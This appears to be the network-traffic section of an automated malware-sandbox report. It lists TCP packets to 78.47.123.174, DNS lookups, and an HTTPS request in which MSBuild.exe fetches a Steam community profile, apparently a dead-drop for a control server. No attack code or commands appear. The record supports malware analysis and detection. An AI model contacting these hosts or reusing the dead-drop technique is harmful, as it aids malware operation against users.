                                                                                        May 24, 2024 10:27:26.627671957 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.627882957 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.627918005 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.279850960 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.279937983 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.280333996 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.280360937 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.280498028 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.280512094 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.749371052 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.749406099 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.749450922 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.749480009 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.749546051 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.749576092 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.749639034 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.779954910 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.780036926 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.780061007 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.780091047 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.780107975 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.780136108 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.845005035 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.845081091 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.845120907 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.845155954 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.845185041 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.845215082 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.874125004 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.874192953 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.874265909 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.874294996 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.874315977 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.874335051 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.909564018 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.909636021 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.909699917 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.909744024 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.909754038 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.909806967 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.934413910 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.934581041 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.934582949 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.934617996 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.934652090 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.934668064 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.955643892 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.955715895 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.955766916 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.955799103 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.955816984 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.955846071 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.972311974 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.972371101 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.972415924 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.972455978 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.972495079 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.972507954 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.988815069 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.988847017 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.988908052 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:27.988939047 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:27.988981962 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.003396034 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.003444910 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.003474951 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.003505945 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.003523111 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.003546000 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.018429995 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.018460989 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.018503904 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.018537045 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.018552065 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.018579960 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.032124043 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.032147884 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.032188892 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.032211065 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.032227993 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.032252073 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.044555902 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.044579983 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.044631004 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.044646978 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.044661999 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.044688940 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.054347992 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.054369926 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.054435015 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.054451942 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.054472923 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.054491043 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.063640118 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.063666105 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.063714981 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.063730001 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.063744068 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.063767910 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.073921919 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.073962927 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.074007034 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.074021101 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.074035883 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.074049950 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.074059010 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.074094057 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.074302912 CEST49760443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.074321985 CEST4434976078.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.106020927 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.106056929 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.106132030 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.106349945 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.106370926 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.766757011 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.766973019 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.767632008 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.767642975 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:28.767857075 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:28.767860889 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.231298923 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.231328964 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.231349945 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.231375933 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.231399059 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.231406927 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.231465101 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.262746096 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.262773991 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.263057947 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.263077021 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.263119936 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.329334021 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.329359055 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.329421043 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.329438925 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.329478979 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.363078117 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.363097906 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.363305092 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.363326073 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.363380909 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.391751051 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.391804934 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.391839027 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.391846895 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.391885996 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.391906023 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.392458916 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.392477989 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.577991009 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.578032970 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.578108072 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.578397989 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.578413010 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.264190912 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265341043 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.265356064 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.265367031 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.776145935 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.776189089 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.776253939 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.776508093 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.776525021 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.001147032 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.001210928 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.001224041 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.001256943 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.001983881 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.002006054 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.454801083 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.454967976 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.455447912 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.455463886 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.455658913 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.455672026 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141060114 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141119003 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141241074 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141241074 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141257048 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141324043 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141664028 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141710997 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.145246029 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.145303965 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.145425081 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.145730972 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.145751953 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.900789022 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.901091099 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.901566982 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.901595116 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.901731968 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.901745081 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.587704897 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.587847948 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.587902069 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.587979078 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.588021040 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.588062048 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.589250088 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.589296103 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.589421988 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.589618921 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.589653969 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:34.326842070 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:34.327047110 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:34.327425957 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:34.327452898 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:34.327585936 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:34.327600956 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016491890 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016546011 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016602993 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016602993 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016633987 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016674995 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016679049 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016725063 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016890049 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016902924 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.034032106 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.034060955 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.034164906 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.034349918 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.034363985 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.783600092 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.783759117 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.784290075 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.784300089 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.784491062 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.784496069 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:36.468034029 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:36.468204021 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:36.468216896 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:36.468307972 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:36.469054937 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:36.469079018 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.123930931 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.123997927 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.124130011 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.124509096 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.124519110 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.777456045 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.777578115 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778182030 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778194904 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778336048 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778342009 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778459072 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778476000 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778527975 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778533936 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778584957 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778598070 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778690100 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778702974 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778723955 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778737068 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778820992 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778837919 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778856039 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778881073 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778918982 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778930902 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.779017925 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.779033899 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.990639925 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.990741968 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.990757942 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.990789890 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.991084099 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.991107941 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.994832993 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.994874001 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.994952917 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.995157003 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.995165110 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:39.706155062 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:39.706231117 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:39.706753969 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:39.706763983 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:39.706940889 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:39.706944942 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:40.409694910 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:40.409872055 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:40.409874916 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:40.409924984 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:40.410059929 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:40.410077095 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:42.922794104 CEST4972680192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:27:42.922843933 CEST4972580192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:27:42.928811073 CEST8049726104.18.38.233192.168.2.4
                                                                                        May 24, 2024 10:27:42.928925037 CEST4972680192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:27:42.933840036 CEST8049725104.18.38.233192.168.2.4
                                                                                        May 24, 2024 10:27:42.933902025 CEST4972580192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:28:07.204853058 CEST4972380192.168.2.4199.232.210.172
                                                                                        May 24, 2024 10:28:07.205033064 CEST4972480192.168.2.4199.232.210.172
                                                                                        May 24, 2024 10:28:07.216223955 CEST8049723199.232.210.172192.168.2.4
                                                                                        May 24, 2024 10:28:07.216319084 CEST4972380192.168.2.4199.232.210.172
                                                                                        May 24, 2024 10:28:07.221324921 CEST8049724199.232.210.172192.168.2.4
                                                                                        May 24, 2024 10:28:07.221417904 CEST4972480192.168.2.4199.232.210.172

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        May 24, 2024 10:27:00.390662909 CEST5454753192.168.2.41.1.1.1
                                                                                        May 24, 2024 10:27:00.398055077 CEST53545471.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        May 24, 2024 10:27:00.390662909 CEST192.168.2.41.1.1.10xe6fcStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        May 24, 2024 10:27:00.398055077 CEST1.1.1.1192.168.2.40xe6fcNo error (0)steamcommunity.com23.199.218.33A (IP address)IN (0x0001)false
                                                                                        May 24, 2024 10:27:03.652335882 CEST1.1.1.1192.168.2.40xa39dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        May 24, 2024 10:27:03.652335882 CEST1.1.1.1192.168.2.40xa39dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • steamcommunity.com
                                                                                        • 78.47.123.174

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.44973223.199.218.334436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:01 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                                                        Host: steamcommunity.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:02 UTC1882INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Type: text/html; charset=UTF-8
